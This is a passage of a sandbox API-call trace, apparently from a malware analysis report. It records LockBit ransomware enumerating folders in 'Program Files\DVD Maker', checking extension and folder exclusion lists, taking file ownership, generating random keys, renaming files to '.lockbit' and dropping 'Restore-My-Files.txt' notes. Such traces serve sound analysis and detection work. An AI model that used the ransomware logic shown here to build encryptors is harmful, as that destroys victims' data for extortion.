returned -1 [0095.296] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0095.296] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0095.296] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0095.296] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0095.296] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0095.296] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0095.296] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0095.296] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0095.296] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0095.296] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0095.296] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0095.296] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0095.296] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0095.296] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0095.297] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0095.297] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0095.297] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0095.297] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0095.297] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0095.297] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0095.297] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0095.297] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0095.297] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0095.297] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0095.297] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\203x8subpicture.png.lockbit") returned 82 [0095.297] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\203x8subpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\videowall\\203x8subpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0095.299] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0095.301] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0095.301] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0095.303] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0095.304] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0095.304] RtlFreeAnsiString (AnsiString="\\") [0095.304] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x334) returned 0x0 [0095.304] malloc (_Size=0x200) returned 0x77d800 [0095.304] NtQueryInformationToken (in: TokenHandle=0x334, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0095.305] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0095.305] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0095.305] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\203x8subpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0095.305] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\203x8subpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0095.306] CloseHandle (hObject=0x334) returned 1 [0095.306] free (_Block=0x77d800) [0095.306] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\203x8subpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\videowall\\203x8subpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x334 [0095.306] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0095.306] malloc (_Size=0x40068) returned 0x3db00b8 [0095.311] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x3db00d0 | out: lpFileSize=0x3db00d0*=2820) returned 1 [0095.311] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0095.314] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0095.314] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df00ec, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df00ec) returned 0x0 [0095.314] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0095.317] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0095.317] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df00fc, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df00fc) returned 0x0 [0095.317] ReadFile (in: hFile=0x334, lpBuffer=0x3db00ec, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8) returned 1 [0095.320] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\203x8subpicture.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\203x8subpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0095.320] malloc (_Size=0xba) returned 0x3ef0008 [0095.320] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x3d6aa8c, FileInformation=0x3ef0008, Length=0xba, FileInformationClass=0xa) returned 0x0 [0095.321] free (_Block=0x3ef0008) [0095.321] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\203x8subpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall") returned 1 [0095.321] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\Restore-My-Files.txt") returned 75 [0095.321] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\videowall\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x1194 [0095.322] CreateIoCompletionPort (FileHandle=0x1194, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0095.322] malloc (_Size=0x40068) returned 0x3df0128 [0095.325] WriteFile (in: hFile=0x1194, lpBuffer=0x1fa30f8, nNumberOfBytesToWrite=0x472, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0128 | out: lpBuffer=0x1fa30f8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0128) returned 0x0 [0095.326] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f27de93, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f27de93, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554a7971, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x4d86, dwReserved0=0x0, dwReserved1=0x0, cFileName="videowall.png", cAlternateFileName="")) returned 1 [0095.326] lstrcmpiW (lpString1=".", lpString2="videowall.png") returned -1 [0095.326] lstrcmpiW (lpString1="..", lpString2="videowall.png") returned -1 [0095.326] PathFindExtensionW (pszPath="videowall.png") returned=".png" [0095.326] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0095.326] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0095.326] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0095.327] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0095.327] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0095.327] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0095.327] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0095.327] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0095.327] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0095.327] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0095.327] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0095.327] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0095.327] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0095.327] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0095.327] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0095.327] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0095.327] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0095.327] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0095.327] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0095.327] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0095.328] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0095.328] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0095.328] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0095.328] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0095.328] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0095.328] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0095.328] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0095.328] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0095.328] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0095.328] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0095.328] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0095.328] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0095.328] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0095.328] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0095.328] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0095.328] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0095.328] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0095.328] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0095.329] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0095.329] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0095.329] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0095.329] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0095.329] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0095.329] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0095.329] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0095.329] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0095.329] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0095.329] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="videowall.png") returned -1 [0095.329] lstrcmpiW (lpString1="ntldr", lpString2="videowall.png") returned -1 [0095.329] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="videowall.png") returned -1 [0095.329] lstrcmpiW (lpString1="bootsect.bak", lpString2="videowall.png") returned -1 [0095.329] lstrcmpiW (lpString1="autorun.inf", lpString2="videowall.png") returned -1 [0095.329] lstrcmpiW (lpString1="thumbs.db", lpString2="videowall.png") returned -1 [0095.329] lstrcmpiW (lpString1="iconcache.db", lpString2="videowall.png") returned -1 [0095.330] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\") returned="" [0095.330] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\videowall.png") returned=".png" [0095.330] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0095.330] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0095.330] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0095.330] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0095.330] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0095.330] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0095.330] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0095.330] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0095.330] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0095.330] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0095.330] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0095.330] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0095.330] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0095.330] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0095.330] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0095.330] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0095.331] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0095.331] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0095.331] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0095.331] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0095.331] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0095.331] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0095.331] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0095.331] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0095.331] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0095.331] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0095.331] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0095.331] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0095.331] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\videowall.png.lockbit") returned 76 [0095.331] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\videowall.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\videowall\\videowall.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0095.334] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0095.335] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0095.335] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0095.337] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0095.338] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0095.639] RtlFreeAnsiString (AnsiString="\\") [0095.639] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x330) returned 0x0 [0095.639] malloc (_Size=0x200) returned 0x77d800 [0095.639] NtQueryInformationToken (in: TokenHandle=0x330, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0095.639] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0095.639] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0095.639] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\videowall.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0095.640] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\videowall.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0095.641] CloseHandle (hObject=0x330) returned 1 [0095.641] free (_Block=0x77d800) [0095.641] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\videowall.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\videowall\\videowall.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x330 [0095.641] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0095.641] malloc (_Size=0x40068) returned 0x3d70048 [0095.641] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=19846) returned 1 [0095.641] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0095.645] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0095.645] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0095.645] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0095.650] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0095.656] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0095.656] ReadFile (in: hFile=0x330, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0095.687] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\videowall.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\videowall.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0095.687] malloc (_Size=0xae) returned 0x77d800 [0095.687] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xae, FileInformationClass=0xa) returned 0x0 [0095.692] free (_Block=0x77d800) [0095.692] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\videowall.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall") returned 1 [0095.692] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\Restore-My-Files.txt") returned 75 [0095.692] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\VideoWall\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\videowall\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0095.692] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f27de93, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f27de93, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554a7971, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x4d86, dwReserved0=0x0, dwReserved1=0x0, cFileName="videowall.png", cAlternateFileName="")) returned 0 [0095.692] FindClose (in: hFindFile=0x55fe78 | out: hFindFile=0x55fe78) returned 1 [0095.692] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1ad8615, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa761cf6, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1afe884, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x520150, dwReserved1=0x0, cFileName="Vignette", cAlternateFileName="")) returned 1 [0095.693] lstrcmpiW (lpString1=".", lpString2="Vignette") returned -1 [0095.693] lstrcmpiW (lpString1="..", lpString2="Vignette") returned -1 [0095.693] lstrcmpiW (lpString1="Vignette", lpString2="$windows.~bt") returned 1 [0095.693] lstrcmpiW (lpString1="Vignette", lpString2="intel") returned 1 [0095.693] lstrcmpiW (lpString1="Vignette", lpString2="msocache") returned 1 [0095.693] lstrcmpiW (lpString1="Vignette", lpString2="$recycle.bin") returned 1 [0095.693] lstrcmpiW (lpString1="Vignette", lpString2="$windows.~ws") returned 1 [0095.693] lstrcmpiW (lpString1="Vignette", lpString2="tor browser") returned 1 [0095.693] lstrcmpiW (lpString1="Vignette", lpString2="boot") returned 1 [0095.693] lstrcmpiW (lpString1="Vignette", lpString2="system volume information") returned 1 [0095.693] lstrcmpiW (lpString1="Vignette", lpString2="perflogs") returned 1 [0095.693] lstrcmpiW (lpString1="Vignette", lpString2="google") returned 1 [0095.693] lstrcmpiW (lpString1="Vignette", lpString2="application data") returned 1 [0095.693] lstrcmpiW (lpString1="Vignette", lpString2="windows") returned -1 [0095.693] lstrcmpiW (lpString1="Vignette", lpString2="windows.old") returned -1 [0095.693] lstrcmpiW (lpString1="Vignette", lpString2="appdata") returned 1 [0095.693] lstrcmpiW (lpString1="Vignette", lpString2="Windows nt") returned -1 [0095.693] lstrcmpiW (lpString1="Vignette", lpString2="Msbuild") returned 1 [0095.693] lstrcmpiW (lpString1="Vignette", lpString2="Microsoft") returned 1 [0095.693] lstrcmpiW (lpString1="Vignette", lpString2="All users") returned 1 [0095.693] lstrcmpiW (lpString1="Vignette", lpString2="mozilla") returned 1 [0095.693] lstrcmpiW (lpString1="Vignette", lpString2="Microsoft.NET") returned 1 [0095.693] lstrcmpiW (lpString1="Vignette", lpString2="microsoft shared") returned 1 [0095.693] lstrcmpiW (lpString1="Vignette", lpString2="Internet Explorer") returned 1 [0095.693] lstrcmpiW (lpString1="Vignette", lpString2="common files") returned 1 [0095.693] lstrcmpiW (lpString1="Vignette", lpString2="opera") returned 1 [0095.693] lstrcmpiW (lpString1="Vignette", lpString2="Windows Journal") returned -1 [0095.694] wsprintfW (in: param_1=0x3d6b928, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette") returned 53 [0095.694] wsprintfW (in: param_1=0x3d6ad00, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\*") returned 55 [0095.694] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\*", fInfoLevelId=0x0, lpFindFileData=0x3d6b120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x3d6b120) returned 0x55fe78 [0095.707] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0095.707] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1ad8615, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa761cf6, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1afe884, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0095.707] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0095.707] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0095.707] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f84b3be, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f84b3be, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554a7971, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11da, dwReserved0=0x0, dwReserved1=0x0, cFileName="1047x576black.png", cAlternateFileName="")) returned 1 [0095.707] lstrcmpiW (lpString1=".", lpString2="1047x576black.png") returned -1 [0095.707] lstrcmpiW (lpString1="..", lpString2="1047x576black.png") returned -1 [0095.708] PathFindExtensionW (pszPath="1047x576black.png") returned=".png" [0095.708] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0095.708] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0095.708] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0095.708] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0095.708] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0095.708] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0095.708] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0095.708] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0095.708] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0095.708] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0095.708] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0095.708] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0095.708] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0095.708] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0095.708] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0095.709] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0095.709] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0095.709] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0095.709] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0095.709] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0095.709] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0095.709] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0095.709] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0095.709] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 